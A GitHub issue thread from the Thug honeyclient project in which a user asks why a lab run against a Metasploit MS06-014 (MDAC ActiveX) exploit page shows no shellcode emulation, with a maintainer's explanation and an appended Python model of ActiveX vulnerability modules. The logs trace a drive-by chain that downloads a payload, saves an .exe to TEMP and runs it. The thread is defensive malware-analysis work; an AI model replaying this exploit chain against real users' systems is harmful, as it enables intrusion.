buffer / thug

Python low-interaction honeyclient
GNU General Public License v2.0

thug and libem/pylibemu #99

Closed twmeares closed 10 years ago

twmeares commented 10 years ago

I've been trying to get a better grasp of thug over the past week, but I keep getting stuck, which makes it difficult to gain a better understanding of the honeyclient. Today I've been looking into libemu and pylibemu. I can get both of these to work independently, but when I run thug I don't really see any shellcode emulation in the output or in the log files. There aren't many resources for thug usage beyond the explanation of the output given by python thug.py -h online, so maybe I'm just not looking in the right place.

As an example I used metasploit to host a site using the ms06_014 exploit (exploit/windows/browser/ie_createobject in metasploit) with the payload windows/shell/reverse_tcp. Thug gives the following output:

root@honeydrive:/honeydrive/thug/src# python thug.py  http://172.16.34.128:8080/saiGXyKZRH5

[2014-08-20 05:44:20] [window open redirection] about:blank -> http://172.16.34.128:8080/saiGXyKZRH5
[2014-08-20 05:44:20] [HTTP] URL: http://172.16.34.128:8080/saiGXyKZRH5 (Status: 200, Referrer: None)
[2014-08-20 05:44:20] [HTTP] URL: http://172.16.34.128:8080/saiGXyKZRH5 (Content-type: text/html, MD5: 5d68e8b50c02417a8ed51cfd72e4d680)
[2014-08-20 05:44:20] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (WScript.Shell)
[2014-08-20 05:44:20] ActiveXObject: wscript.shell
[2014-08-20 05:44:20] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (WScript.Shell)
[2014-08-20 05:44:20] ActiveXObject: wscript.shell
[2014-08-20 05:44:20] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (ADODB.Stream)
[2014-08-20 05:44:20] ActiveXObject: adodb.stream
[2014-08-20 05:44:20] [WScript.Shell ActiveX] Environment("Process")
[2014-08-20 05:44:20] [WScript.Shell ActiveX] Getting Environment Item: TEMP
[2014-08-20 05:44:20] ActiveXObject: microsoft.xmlhttp
[2014-08-20 05:44:20] [Microsoft XMLHTTP ActiveX] open('GET', 'http://172.16.34.128:8080/saiGXyKZRH5/payload', False)
[2014-08-20 05:44:20] [Microsoft XMLHTTP ActiveX] send
[2014-08-20 05:44:20] [Microsoft XMLHTTP ActiveX] Fetching from URL http://172.16.34.128:8080/saiGXyKZRH5/payload (method: GET)
[2014-08-20 05:44:20] [Microsoft XMLHTTP Exploit redirection] http://172.16.34.128:8080/saiGXyKZRH5 -> http://172.16.34.128:8080/saiGXyKZRH5/payload
[2014-08-20 05:44:21] [URL Classifier] URL: http://172.16.34.128:8080/saiGXyKZRH5/payload (Rule: SweetOrange 1, Classification: PDF or JAR, Exploit Kit)
[2014-08-20 05:44:21] [HTTP] URL: http://172.16.34.128:8080/saiGXyKZRH5/payload (Status: 200, Referrer: http://172.16.34.128:8080/saiGXyKZRH5)
[2014-08-20 05:44:21] [HTTP] URL: http://172.16.34.128:8080/saiGXyKZRH5/payload (Content-type: application/octet-stream, MD5: 21d5a930ee1853c81cdb730ce41913dd)
[2014-08-20 05:44:22] [Adodb.Stream ActiveX] open
[2014-08-20 05:44:22] [Adodb.Stream ActiveX] Write
[2014-08-20 05:44:22] [Adodb.Stream ActiveX] SaveToFile (TEMP\sXPrhuCmSkaaDsPBvqeovzQnhxcRXFY.exe)
[2014-08-20 05:44:22] [WScript.Shell ActiveX] Executing: TEMP\sXPrhuCmSkaaDsPBvqeovzQnhxcRXFY.exe
[2014-08-20 05:44:22] Saving log analysis at ../logs/e70a75375ef8d87767d8f64fdee21fc3/20140820054420

From the output it's clear that thug shows the vulnerability is in ActiveX and that there is a shell script being executed, but I'd like to see the detailed emulation from pylibemu. However, I can't find the shellcode from the analysis, which to my knowledge is needed for the emulation, as it's done that way in the pylibemu readme file. Furthermore, I tried using libemu to emulate but it crashes saying cpu error error accessing 0x00000004 not mapped. This could be because I ran it with the executable given in ../applications/octet-stream.

I hope this isn't overly confusing. I'm somewhat new to the world of honeyclients and malware detection, but I've been asked to experiment with and report on thug. I have a number of other questions which I've been searching the web for, but like I said there isn't much detailed documentation of the usage. Thanks, Taylor

buffer commented 10 years ago

Hi Taylor, first of all I would like to suggest that you subscribe to the Thug mailing lists, because these are not issues but questions about Thug, and the mailing lists are a better place to discuss these things IMHO.

BTW you did not choose the best exploit, considering that the MDAC exploit does not make use of any shellcode, so there is no emulation at all in this specific case. You can easily take a look at how shellcode emulation works using one of the samples already provided.

buffer@rigel ~/thug/src $ python thug.py -l ../samples/exploits/22196.html
[..]
[2014-08-20 10:37:52] ActiveXObject: 77829F14-D911-40FF-A2F0-D11DB8D6D0BC
[2014-08-20 10:37:52] [NCTAudioFile2 ActiveX] Overflow in SetFormatLikeSample
[2014-08-20 10:37:52] [Shellcode Profile]

UINT WINAPI WinExec (
    LPCSTR = 0x02eb2b80 =>
        = "calc.exe";
    UINT uCmdShow = 0;
) = 0x20;
void ExitThread (
    DWORD dwExitCode = 0;
) = 0x0;
[..]

twmeares commented 10 years ago

I subscribed to the list. Thanks for the tip. However, your response has me somewhat puzzled. As I said, I'm quite new to this. If the exploit doesn't use shellcode, what is meant by the line [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (WScript.Shell)?

buffer commented 10 years ago

That log line is the result of the ActiveX object emulation. Thug implements an ActiveX layer of its own (source code located at src/ActiveX) which is used to emulate some well-known vulnerabilities in some ActiveX objects through the vulnerability modules (source code located at src/ActiveX/modules). Some of these vulnerabilities make use of a shellcode but some others (like MDAC) do not require one because they are more logical errors than vulnerabilities.
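The distinction buffer draws above (a logic-flaw module such as MDAC logs the objects the page creates and never produces a shellcode, while an overflow module hands an oversized argument to libemu) can be shown with a small model of an ActiveX vulnerability layer. This is an added illustration, not Thug's own code: the module table, the `Event`/`Trace` types, the 0x1000 overflow threshold and the NCTAudioFile2 entry keyed by the CLSID from the log above are assumptions made for the example. The `emulate()` helper calls pylibemu's `Emulator().run()`, `emu_profile_output` and `free()` as I understand that API; it is optional, and the rest of the file runs without pylibemu installed. The two sample traces are constructed: the first replays the CreateObject calls from Taylor's MDAC log, the second feeds a filler buffer (not real shellcode) to the overflow module.

```python
"""Toy ActiveX vulnerability layer showing when a honeyclient needs
shellcode emulation. Added illustration, not Thug's code; names and the
threshold below are assumptions made for this example."""
from dataclasses import dataclass, field
from typing import List, Optional

OVERFLOW_THRESHOLD = 0x1000  # assumed: a string this long to a short-name API is an overflow

# (progid-or-clsid, method) -> (log prefix, how the module treats the call)
# "logic": the API does exactly what it is told, no memory corruption.
# "overflow": the argument itself is the attack buffer and carries the payload.
VULN_MODULES = {
    ("rds.dataspace", "createobject"):
        ("Microsoft MDAC RDS.Dataspace ActiveX", "logic"),
    ("77829f14-d911-40ff-a2f0-d11db8d6d0bc", "setformatlikesample"):
        ("NCTAudioFile2 ActiveX", "overflow"),
}


@dataclass
class Event:
    module: str
    message: str
    shellcode: Optional[bytes] = None  # set only when a buffer is handed to libemu


@dataclass
class Trace:
    events: List[Event] = field(default_factory=list)

    def log(self, module: str, message: str, shellcode: Optional[bytes] = None) -> None:
        self.events.append(Event(module, message, shellcode))


def emulate(shellcode: bytes) -> Optional[str]:
    """Return libemu's API-call profile for the buffer when pylibemu is
    installed (assumed API: Emulator.run / emu_profile_output / free),
    otherwise None so the rest of the analysis still completes."""
    try:
        import pylibemu  # optional dependency, labelled as an assumption
    except ImportError:
        return None
    emu = pylibemu.Emulator()
    try:
        emu.run(shellcode)
        return emu.emu_profile_output
    finally:
        emu.free()


def activex_call(trace: Trace, progid: str, method: str, args: list) -> None:
    """Dispatch one ActiveX method invocation the way a vulnerability module sees it."""
    key = (progid.lower(), method.lower())
    if key not in VULN_MODULES:
        return
    module, kind = VULN_MODULES[key]
    if kind == "logic":
        # MDAC: CreateObject simply hands the page a WScript.Shell, ADODB.Stream,
        # etc.  Nothing is corrupted, so the log records the object and moves on.
        trace.log(module, f"{method} ({args[0]})")
        return
    # Overflow module: only an oversized argument is an exploit attempt, and
    # that buffer is what would be passed to the shellcode emulator.
    buf = args[0].encode("latin-1") if isinstance(args[0], str) else bytes(args[0])
    if len(buf) > OVERFLOW_THRESHOLD:
        trace.log(module, f"Overflow in {method}", shellcode=buf)
        profile = emulate(buf)
        if profile:
            trace.log("Shellcode Profile", profile)


def needs_shellcode_emulation(trace: Trace) -> bool:
    return any(e.shellcode is not None for e in trace.events)


def mdac_trace() -> Trace:
    """Constructed replay of the CreateObject calls from the MDAC log above."""
    t = Trace()
    for obj in ("WScript.Shell", "WScript.Shell", "ADODB.Stream"):
        activex_call(t, "RDS.DataSpace", "CreateObject", [obj])
    return t


def overflow_trace() -> Trace:
    """Constructed overflow call: a NOP-byte run plus int3 filler, not real shellcode."""
    buf = b"\x90" * OVERFLOW_THRESHOLD + b"\xcc" * 16
    t = Trace()
    activex_call(t, "77829F14-D911-40FF-A2F0-D11DB8D6D0BC", "SetFormatLikeSample", [buf])
    return t


if __name__ == "__main__":
    for name, tr in (("MDAC", mdac_trace()), ("NCTAudioFile2", overflow_trace())):
        print(name, "needs emulation:", needs_shellcode_emulation(tr))
        for e in tr.events:
            print(f"  [{e.module}] {e.message}")
```

Run against the MDAC replay the model produces exactly the `CreateObject (WScript.Shell)` style lines from Taylor's log and never reaches the emulator; the overflow call produces the `Overflow in SetFormatLikeSample` event carrying the buffer, which is the point at which a real honeyclient would ask libemu for a profile like the WinExec("calc.exe") one above.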